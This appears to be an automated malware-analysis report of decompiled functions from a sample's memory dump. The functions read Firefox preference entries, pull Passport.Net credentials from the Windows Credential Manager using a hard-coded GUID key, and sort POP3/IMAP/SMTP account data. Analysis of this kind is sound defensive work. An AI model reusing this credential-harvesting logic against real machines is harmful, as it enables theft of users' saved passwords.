                                                  			E0040C530(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E004069D2(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x412b10);
						_t60 = 0xb;
						_t14 = E004069D2(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E004069D2(_t61 + 1, 0x412b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E004069D2(_t17, 0x412b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E004069D2(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}






























                                                  0x0040c54b
                                                  0x0040c551
                                                  0x0040c55f
                                                  0x0040c565
                                                  0x0040c573
                                                  0x0040c579
                                                  0x0040c581
                                                  0x0040c587
                                                  0x0040c596
                                                  0x0040c59c
                                                  0x0040c59f
                                                  0x0040c5a8
                                                  0x0040c5af
                                                  0x0040c5bc
                                                  0x0040c5c3
                                                  0x0040c5c4
                                                  0x00000000
                                                  0x00000000
                                                  0x0040c5cf
                                                  0x0040c5d2
                                                  0x0040c5df
                                                  0x0040c5df
                                                  0x0040c5e4
                                                  0x0040c5e7
                                                  0x00000000
                                                  0x00000000
                                                  0x0040c5fe
                                                  0x0040c600
                                                  0x0040c610
                                                  0x0040c61b
                                                  0x0040c661
                                                  0x0040c664
                                                  0x0040c669
                                                  0x0040c66e
                                                  0x0040c671
                                                  0x0040c675
                                                  0x00000000
                                                  0x00000000
                                                  0x0040c677
                                                  0x0040c689
                                                  0x0040c68e
                                                  0x0040c696
                                                  0x0040c69d
                                                  0x0040c6a6
                                                  0x0040c6ab
                                                  0x0040c6b0
                                                  0x0040c6c1
                                                  0x0040c6c9
                                                  0x0040c6cd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040c6cd
                                                  0x0040c61d
                                                  0x0040c62a
                                                  0x0040c62d
                                                  0x0040c62e
                                                  0x00000000
                                                  0x00000000
                                                  0x0040c634
                                                  0x0040c646
                                                  0x0040c64b
                                                  0x0040c653
                                                  0x00000000
                                                  0x0040c6cf
                                                  0x0040c6dd
                                                  0x0040c6e5
                                                  0x00000000
                                                  0x0040c6ec
                                                  0x0040c6f0

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset$strlen$_memicmp
                                                  • String ID: user_pref("
                                                  • API String ID: 765841271-2487180061
                                                  • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                  • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                  • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                  • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E0040559F(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E00404925(0x412466, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048B6(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E0040496E( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}




























                                                  0x004055ab
                                                  0x004055b6
                                                  0x004055cc
                                                  0x004055cf
                                                  0x004055dc
                                                  0x004055de
                                                  0x004055ea
                                                  0x004055ee
                                                  0x004055f3
                                                  0x004055f4
                                                  0x004055f5
                                                  0x004055ff
                                                  0x00405600
                                                  0x00405605
                                                  0x00405608
                                                  0x0040560d
                                                  0x00405612
                                                  0x00405615
                                                  0x00405618
                                                  0x0040561b
                                                  0x004056f5
                                                  0x004056f7
                                                  0x004056fd
                                                  0x00405712
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405621
                                                  0x00405621
                                                  0x00405621
                                                  0x00405624
                                                  0x00405627
                                                  0x0040562d
                                                  0x00405638
                                                  0x0040564c
                                                  0x00405652
                                                  0x00405660
                                                  0x00405669
                                                  0x00405673
                                                  0x00405680
                                                  0x0040568b
                                                  0x0040568d
                                                  0x00405696
                                                  0x00405697
                                                  0x0040569c
                                                  0x0040569d
                                                  0x004056a5
                                                  0x004056a7
                                                  0x004056b9
                                                  0x004056be
                                                  0x004056c3
                                                  0x004056d3
                                                  0x004056d3
                                                  0x004056c3
                                                  0x0040568b
                                                  0x004056d6
                                                  0x004056d9
                                                  0x004056dc
                                                  0x004056e0
                                                  0x004056e9
                                                  0x004056ec
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004055B6
                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055CF
                                                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055DC
                                                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055E8
                                                  • memset.MSVCRT ref: 00405652
                                                  • SendMessageA.USER32(?,00001019,?,?), ref: 00405683
                                                  • SetFocus.USER32(?), ref: 00405708
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSend$FocusItemmemset
                                                  • String ID:
                                                  • API String ID: 4281309102-0
                                                  • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                  • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                  • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                  • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D5DB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E0040D5DB(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046D7( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404647( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x417768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x417768;
							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046C2( &_v60);
				E004047F1( &_v584);
				return _t69;
			}























                                                  0x0040d5db
                                                  0x0040d5ec
                                                  0x0040d5ee
                                                  0x0040d5f6
                                                  0x0040d5f9
                                                  0x0040d5fc
                                                  0x0040d601
                                                  0x0040d603
                                                  0x0040d619
                                                  0x0040d61a
                                                  0x0040d61b
                                                  0x0040d61d
                                                  0x0040d627
                                                  0x0040d62d
                                                  0x0040d633
                                                  0x0040d645
                                                  0x0040d64d
                                                  0x0040d650
                                                  0x0040d652
                                                  0x0040d653
                                                  0x0040d653
                                                  0x0040d65e
                                                  0x0040d666
                                                  0x0040d667
                                                  0x0040d67d
                                                  0x0040d680
                                                  0x0040d68e
                                                  0x0040d6af
                                                  0x0040d6c8
                                                  0x0040d6d1
                                                  0x0040d6d1
                                                  0x0040d6d5
                                                  0x0040d6d5
                                                  0x0040d6db
                                                  0x0040d6db
                                                  0x0040d6df
                                                  0x0040d6df
                                                  0x0040d627
                                                  0x0040d6e5
                                                  0x0040d6f0
                                                  0x0040d6fa

                                                  APIs
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                  • strlen.MSVCRT ref: 0040D6B7
                                                  • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                  • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                  • String ID: Passport.Net\*$hwA
                                                  • API String ID: 3335197805-2625321100
                                                  • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                  • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                  • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                  • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407EFB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 41%
                                                  			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E004118A0(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00407EFB(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4171b4 =  *0x4171b4 + 1;
							_t33 =  *0x4171b4 + 0x11558;
							__eflags =  *0x4171b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E00407EC3(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}









                                                  0x00407efb
                                                  0x00407efe
                                                  0x00407f06
                                                  0x00407f10
                                                  0x00407f18
                                                  0x00407f1c
                                                  0x00407f20
                                                  0x00407fe5
                                                  0x00407fea
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407f26
                                                  0x00407f26
                                                  0x00407f31
                                                  0x00407f36
                                                  0x00407f3d
                                                  0x00407f4c
                                                  0x00407f54
                                                  0x00407f5c
                                                  0x00407f64
                                                  0x00407f68
                                                  0x00407f6c
                                                  0x00407f74
                                                  0x00000000
                                                  0x00000000
                                                  0x00407f7a
                                                  0x00407fc4
                                                  0x00407fc4
                                                  0x00407fc8
                                                  0x00407fca
                                                  0x00407fcb
                                                  0x00407fcf
                                                  0x00407fd2
                                                  0x00407fd7
                                                  0x00407fd7
                                                  0x00000000
                                                  0x00407fc8
                                                  0x00407f83
                                                  0x00407f8c
                                                  0x00407f8e
                                                  0x00407f8e
                                                  0x00407f94
                                                  0x00407f98
                                                  0x00407f9d
                                                  0x00407fa7
                                                  0x00407fb2
                                                  0x00407fb2
                                                  0x00407f9f
                                                  0x00407f9f
                                                  0x00407f9f
                                                  0x00407f9f
                                                  0x00407f9d
                                                  0x00407fbd
                                                  0x00407fc3
                                                  0x00000000
                                                  0x00407fda
                                                  0x00407fda
                                                  0x00407fdb
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                  • String ID: 0$6
                                                  • API String ID: 2300387033-3849865405
                                                  • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                  • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                  • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                  • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004044DA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E004021D8( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060D0(_t44,  &_v796);
				E004060D0(_t44,  &_v408, _t58 + 0x204);
				E004060D0(_t44,  &_v928, _t58 + 4);
				E004060D0(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L004115B2();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L004115B2();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L004115B2();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
			}























                                                  0x004044da
                                                  0x004044e6
                                                  0x004044ee
                                                  0x004044f1
                                                  0x004044fc
                                                  0x004044ff
                                                  0x0040450b
                                                  0x0040450e
                                                  0x00404515
                                                  0x00404527
                                                  0x00404536
                                                  0x00404548
                                                  0x0040455a
                                                  0x0040455f
                                                  0x00404565
                                                  0x0040456a
                                                  0x0040456b
                                                  0x00404575
                                                  0x00404583
                                                  0x00404588
                                                  0x00404589
                                                  0x00404592
                                                  0x004045a0
                                                  0x004045a5
                                                  0x004045a6
                                                  0x004045af
                                                  0x004045b1
                                                  0x004045b1
                                                  0x00404594
                                                  0x00404594
                                                  0x00404594
                                                  0x00404577
                                                  0x00404577
                                                  0x00404577
                                                  0x004045c1
                                                  0x004045ca
                                                  0x004045e5

                                                  APIs
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                  • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp$memcpystrlen
                                                  • String ID: imap$pop3$smtp
                                                  • API String ID: 445763297-821077329
                                                  • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                  • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                  • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                  • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004036CC, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E004021D8( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E00402407( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}



















                                                  0x004036cc
                                                  0x004036cc
                                                  0x004036dc
                                                  0x004037ae
                                                  0x004037ae
                                                  0x004036ed
                                                  0x004036f0
                                                  0x004036f7
                                                  0x00403702
                                                  0x00403706
                                                  0x0040370b
                                                  0x00403711
                                                  0x0040371e
                                                  0x00403721
                                                  0x0040372f
                                                  0x0040373f
                                                  0x0040374b
                                                  0x00403755
                                                  0x0040376e
                                                  0x00403783
                                                  0x00403788
                                                  0x00403799
                                                  0x004037a7
                                                  0x004037a7
                                                  0x00403711
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                    • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                    • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                    • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                  • strchr.MSVCRT ref: 00403706
                                                  • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                  • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                  • strlen.MSVCRT ref: 0040375F
                                                  • sprintf.MSVCRT ref: 00403783
                                                  • strcpy.MSVCRT(?,?), ref: 00403799
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                  • String ID: %s@gmail.com
                                                  • API String ID: 2649369358-4097000612
                                                  • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                  • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                  • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                  • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040684D, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}
















                                                  0x0040684d
                                                  0x0040685c
                                                  0x00406866
                                                  0x0040686d
                                                  0x00406872
                                                  0x00406875
                                                  0x0040687a
                                                  0x0040687d
                                                  0x00406883
                                                  0x00406886
                                                  0x00406889
                                                  0x0040689a
                                                  0x004068a6
                                                  0x004068ab
                                                  0x004068bb
                                                  0x004068c5
                                                  0x004068c9
                                                  0x004068ce
                                                  0x004068d9
                                                  0x004068e1
                                                  0x004068e4
                                                  0x004068e7
                                                  0x004068e7
                                                  0x004068ea
                                                  0x004068ea
                                                  0x004068f0
                                                  0x004068f1
                                                  0x004068f4
                                                  0x004068f7
                                                  0x004068ff

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpystrlen$memsetsprintf
                                                  • String ID: %s (%s)
                                                  • API String ID: 3756086014-1363028141
                                                  • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                  • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
